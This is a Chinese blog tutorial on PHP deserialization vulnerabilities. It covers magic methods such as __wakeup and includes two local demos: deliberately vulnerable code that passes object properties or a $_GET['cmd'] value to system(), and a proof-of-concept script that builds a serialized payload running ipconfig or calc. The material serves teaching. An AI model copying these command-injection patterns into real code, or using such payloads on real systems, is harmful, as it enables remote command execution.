PHP 反序列化漏洞

已于 2023-11-22 09:32:04 修改
阅读量458 收藏
点赞数 7
分类专栏: # 反序列化 文章标签: 网络安全 web安全 笔记
于 2023-11-21 18:57:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134538660
版权

反序列化漏洞

概念

序列化

将对象转化为便于传输的格式,常见序列化格式有二进制、字节数组、json 字符串、xml 字符串,php 中使用 serialize() 函数进行序列化

反序列化

反序列化则是将序列化后的数据重新转换为原始的数据结构或对象的过程,php 中使用 unserialize() 函数进行反序列化

序列化和反序列化原因

为了保证数据的存储和传输

魔术方法

在特定的情况下会被自动调用,以双下划线 __ 开头,即使魔术方法在类中没有被定义,也是真实存在的。

__construct() 在创建对象时自动调用

__destruct() 在销毁对象时自动调用

__wakeup() unserialize()反序列化时会自动调用这个函数

__sleep() serialize()序列化时会自动调用这个函数

反序列化漏洞

用户传给 unserialize() 的经过序列化后的参数可控。当对象的销毁和创建或使用 unserialize() 等函数对用户提供的数据进行反序列化等操作时,魔术方法自动调用,魔术方法本身自动调用了其他方法,其他方法又调用了其他方法,最终呈现一种链式调用,将参数传递到危险函数,最终实现命令执行

例1

此例重点在 经过序列化后的参数可控

服务器端 PHP 代码

1.php

<?php
// 1.php

    
// 定义函数 a()
function a($cmd){
	@system($cmd);
}
// 创建 test 类
class test{
	// 定义属性
	public $name;
	public $age;
	// 定义方法,当执行 unserialize() 反序列化函数时自动调用 __wakeup() 方法
	public function __wakeup(){
        // $this 可以在类的方法中使用,用来访问当前对象的属性和方法。传参给函数 a(),执行系统命令
		@a($this->name);
	}
	
}
//*****************************************
// 此处的 $str 模拟接收客户端上传的数据
$str='O:4:"test":2:{s:4:"name";s:8:"ipconfig";s:3:"age";i:18;}';
print_r($str);
echo "<br>";
//******************************************
// 反序列化
$str=unserialize($str);
var_dump($str);
?>

生成 Payload 的 POC

2.php

新建 test 类的对象,对象中 $name 的值会传递到函数 a() 中,从而控制执行的命令,所以要控制执行的命令,需要改 name

<?php
// 2.php
    
// 创建 test 类
class test{
	// 定义属性
	public $name;
	public $age;
	// 定义方法,当执行 unserialize() 反序列化函数时自动调用 __wakeup() 方法
	public function __wakeup(){
		a($cmd);
	}
	
}
echo "*****************************************<br>";
echo "payload<br>";
// 创建对象
$person1=new test;
// 对象赋值
$person1->name="ipconfig";
$person1->age=18;
// 序列化
$person1=serialize($person1);
echo "<br>";
print_r($person1);
echo "<br>*****************************************";
?>

演示

calc

使用 2.php 生成 Payload

image-20231121205600170

将 Payload 复制到 1.php 文件,模拟上传序列化后的参数,访问 1.php,成功执行

image-20231121205718268

ipconfig

使用 2.php 生成 执行 ipconfig 的 Payload

image-20231121204343431

image-20231121204417565

修改 1.php 中的 payload,成功执行 ipconfig

image-20231121204600130

例2

传递的未经序列化的参数,不是很标准,但体现了链式调用

PHP 代码

<?php
// 定义函数 a()
function a(){
	// 调用函数 b()
	b();
}
// 定义函数 b()
function b(){
	// 如果参数 cmd 的值为 calc 则打开计算器
    $cmd=$_GET['cmd'];
    @system($cmd);
}
// 创建 test 类
class test{
	// 定义属性
	public $name;
	public $age;
	// 定义方法,当执行 unserialize() 反序列化函数时自动调用 __wakeup() 方法
	public function __wakeup(){
		a();
	}
	
}
// 创建对象
$person1=new test;
// 对象赋值
$person1->name="zhangsan";
$person1->age=18;
// 序列化
$person1=serialize($person1);
var_dump($person1);
// 反序列化
echo "<hr>";
$person1=unserialize($person1);
var_dump($person1);

?>

漏洞逻辑

当执行反序列化语句 $person1=unserialize($person1); 时,系统会自动调用 test() 类中的 __wakeup() 方法,__wakeup() 方法调用函数 a(),函数 a() 调用函数 b(),函数 b() 接收传参,执行系统命令

验证

当成功执行反序列化函数 unserialize() 并且成功传参时,成功执行系统命令

http://127.0.0.1/1.php?cmd=calc

image-20231121184253452

http://127.0.0.1/1.php?cmd=ipconfig

image-20231121184800431

当未使用反序列化函数时,不会触发 __wakeup() 方法,从而未进行链式调用,函数 b() 未被调用,不会执行命令

image-20231121184659242

gjl_
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php 反序列化漏洞
good good study
01-09 5319
什么是序列化 序列化即 将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象 简单来说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信 。 反序列分为PHP反序列和java反序列化,下面就以PHP反序列化漏洞为切入点,讲述反序列化漏洞核心的原理,其他Java、Python等语言的反序列化漏洞,其原理基本相通。 PHP中的序列化和反序列化
反序列化漏洞-02】PHP反序列化漏洞原理测试及魔术方法总结
m0_64378913的博客
07-22 938
PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞形成的根本原因是程序没有对用户输入的反序列化字节流进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、GetShell等一系列不可控的后果。(在反序列化过程中,会触发代码执行。)反序列化漏洞并非是PHP所特有的,也存在与java、Python等语言中,原理基本相同。(1)理解PHP反序列化漏洞的触发原理;(2)了解PHP相关的魔术方法及调用情况。...
php反序列化漏洞条件,PHP反序列化漏洞总结
weixin_32104797的博客
03-19 262
写在前边做了不少PHP反序列化的题了,是时候把坑给填上了。参考了一些大佬们的博客,自己再做一下总结1.面向对象2.PHP序列化和反序列化3.PHP反序列化漏洞实例1.面向对象在了解序列化和反序列化之前,先简单了解一下PHP的面向对象。万物皆可对象。根据官方手册,PHP中,以关键字class定义一个类,一个类可以包含有属于自己的常量,变量(称为“属性”)以及函数(称为“方法”)。classPeopl...
PHP反序列化漏洞
huangyongkang666的博客
03-22 543
PHP反序列化漏洞 1.关于php面向对象编程: 对象:可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。 类:一个共享相同结构和行为的对象的集合。 ​ 每个类的定义都以关键字class开头,后面跟着类的名字。一个类可以包含有属于自己的变量,变量(称为“属性”)以及函数(“称为方法”)。类定义了一件事物的抽象特点。通常来说,类定义了事物的属性和它可以做到的。类可能会包含一些特殊的函数叫magic函数, magic函数命名是以符号“__”开头的, 比如_construct,_d
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2751
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
PHP反序列化漏洞总结
未完成的歌~的博客
02-22 3567
程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数中注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。
php反序列化漏洞原理、利用方法、危害
白帽黑客八哥的博客
12-23 1328
PHP反序列化漏洞是一种允许攻击者通过将恶意数据反序列化PHP对象来执行任意代码的漏洞。这通常是通过向具有反序列化功能的PHP应用程序提交经过精心设计的输入来实现的。
PHP反序列化漏洞解析
weixin_43960066的博客
10-13 1074
先观察代码中是否有class,然后查找是否有反序列化的函数,判断是否可控,接着这条线索查找是否有魔术方法可利用,是否有敏感函数利用,开始构造poc,思考代码逻辑,先顺着代码走一边,然后思考poc。方法中有一些敏感函数,例如(include()、file_get_contents()、file_put_contents()、eval()等),总结起来就是一些可以利用的函数。进行序列化,使用**unserialize()**函数进行反序列化。将数组或者class转化字符串,就叫做序列化。
php反序列化漏洞 freebuf,PHP反序列化漏洞进阶之Session反序列化漏洞
weixin_29798379的博客
03-09 251
什么是sessionsession英文翻译为"会话",两个人聊天从开始到结束就构成了一个会话。PHP里的session主要是指客户端浏览器与服务端数据交换的对话,从浏览器打开到关闭,一个最简单的会话周期PHP session工作流程会话的工作流程很简单,当开始一个会话时,PHP会尝试从请求中查找会话 ID (通常通过会话 cookie),如果发现请求的Cookie、Get、Post中不存在sess...
PHP反序列化漏洞-从入门到提升
AkangBoy的博客
11-09 1626
本文从PHP序列化原理讲起,逐渐深入到PHP反序列化及其漏洞,几乎每个知识点都配有代码演示,十分方便理解,希望对你们有所帮助!
PHP反序列化漏洞研究
06-17
PHP反序列化漏洞研究 PHP反序列化漏洞是指攻击者可以通过构造恶意的序列化数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
PHP反序列化漏洞详解.rar
02-07
PHP反序列化漏洞详解-CTF
php反序列化漏洞1
08-04
修改 test.php,到达命令执行来的 phpinfo 覆盖了,但是并没有传入 file 文件名覆盖原来的 file 文件名)(O 是指对象,2 是后面 AA
PHP反序列化漏洞.pdf
08-10
一、认识漏洞 二、利用方式 三、分析实践
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全(补充)
m0_62207482的博客
06-12 1291
虚拟专用网中可以采用隧道技术 IPSec的加密和认证过程中所使用的密钥由IKE机制来生成和分发 传输模式下的AH和ESP处理后的IP头部不变,而隧道模式下的AH和ESP处理后需要新封装一个新的IP头 SSL协议可分为两层,处于下层的是SSL记录 SSL握手协议,由三种协议组合而成,包含握手协议、密码规格变更协议及报警协议。其用途是在两个应用程序开始传送或接收数据前,为其提供服务器和客户端间相互认证的服务,并相互协商决定双方通信使用的加密算法及加密密钥 属于第二层隧道协议的是PPTP和L2TP,第二
网络安全网络安全威胁及途径
最新发布
衍生星球的博客
06-17 78
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
网络安全攻防演练:提升应急响应能力
weixin_64392888的博客
06-14 678
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。
php反序列化漏洞习题
09-06
关于PHP反序列化漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的反序列化,ArrayObject类的题目是easy_phpPHP反序列化漏洞是一种安全漏洞,其中一个具体的例子是CVE-2016-7124,该漏洞存在于php5<5.6.25和php7<7.0.10的版本中。漏洞的产生原因是由于反序列化时对输入的不当处理所导致的。 了解PHP反序列化漏洞的习题,需要掌握类与对象、反序列化基础知识以及一些与魔术方法相关的内容,如构造和折构方法(__construct()、__destruct())、序列化和反序列化方法(__sleep()、__wakeup())、错误调用魔术方法(__callStatic()、__get()、__set()、__isset()、__unset()、__clone())等。反序列化漏洞的成因较复杂,例如POP链构造、POC链反推法等。 此外,还可以学习字符串逃逸和__wakeup魔术方法绕过漏洞的相关知识。其中,__wakeup魔术方法绕过漏洞的产生原因是__wakeup方法可以在反序列化时被绕过,从而可能导致安全漏洞PHP反序列化漏洞还可以通过引用的利用方法来进行学习。另外,还可以学习SESSION反序列化漏洞和phar反序列化漏洞的习题。其中,SESSION反序列化漏洞涉及到不同处理器的不同储存格式,而phar反序列化漏洞需要了解phar的构造和使用条件。 通过这些习题的学习,可以更好地理解PHP反序列化漏洞以及如何进行防范和修复。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PHP反序列化漏洞(最全面最详细有例题)](https://blog.csdn.net/m0_73728268/article/details/129893800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值